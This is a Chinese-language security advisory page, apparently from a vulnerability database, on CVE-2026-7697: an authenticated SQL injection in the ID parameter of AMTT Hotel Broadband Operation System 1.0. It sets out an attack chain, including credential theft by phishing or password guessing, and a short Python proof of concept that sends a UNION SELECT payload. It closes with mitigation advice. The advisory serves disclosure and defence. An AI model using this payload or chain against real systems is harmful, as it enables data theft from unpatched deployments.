IPBUF安全漏洞报告
English
CVE-2026-7697 CVSS 4.7 中危

CVE-2026-7697 AMTT酒店宽带系统SQL注入漏洞

披露日期: 2026-05-03
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7697
漏洞类型
SQL注入
CVSS评分
4.7 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
AMTT Hotel Broadband Operation System

相关标签

SQL注入AMTTWeb安全远程代码执行

漏洞概述

AMTT酒店宽带运营系统1.0版本存在SQL注入漏洞。该漏洞源于文件/manager/card/cardhand_submit.php对参数ID的处理缺乏适当过滤。攻击者需具备高权限,通过构造恶意SQL语句可远程利用此漏洞窃取数据或破坏系统。厂商已获知但未响应。

技术细节

该漏洞位于AMTT酒店宽带运营系统的后台管理模块中。具体受影响文件为`/manager/card/cardhand_submit.php`。在处理用户请求时,系统未对传入的`ID`参数进行严格的输入验证和类型检查,导致攻击者可以将恶意的SQL代码注入到后端数据库查询中。尽管利用此漏洞需要高权限,但一旦认证通过,攻击者可通过基于布尔或时间的盲注技术获取敏感信息、绕过认证或修改数据库内容。由于厂商未提供补丁,该风险持续存在。

攻击链分析

STEP 1
信息收集
识别目标系统为AMTT Hotel Broadband Operation System,并确定其版本为1.0。
STEP 2
获取凭证
攻击者通过弱口令猜测、钓鱼或其他手段获取管理员账号的高权限凭证(PR:H)。
STEP 3
漏洞利用
使用管理员凭证登录,向`/manager/card/cardhand_submit.php`发送包含恶意SQL注入代码的`ID`参数请求。
STEP 4
数据窃取
解析数据库返回的错误信息或页面内容,提取敏感数据(如用户信息、密码哈希)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target_url = "http://vulnerable-host/manager/card/cardhand_submit.php" # Attacker needs High Privilege (Admin Cookie) cookies = { "admin_session": "valid_session_token_here" } # Malicious payload for the 'ID' parameter payload_data = { "ID": "1' UNION SELECT NULL, version(), NULL-- -" } try: response = requests.post(target_url, data=payload_data, cookies=cookies, timeout=10) if response.status_code == 200: print("Request sent successfully. Check response for SQL output.") print(response.text[:200]) except Exception as e: print(f"An error occurred: {e}")

影响范围

AMTT Hotel Broadband Operation System 1.0

防御指南

临时缓解措施
由于厂商尚未发布补丁,建议管理员暂时通过WAF规则拦截针对`cardhand_submit.php`的异常请求,或严格限制管理后台的IP访问白名单。同时,应立即检查系统日志,确认是否已被入侵。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表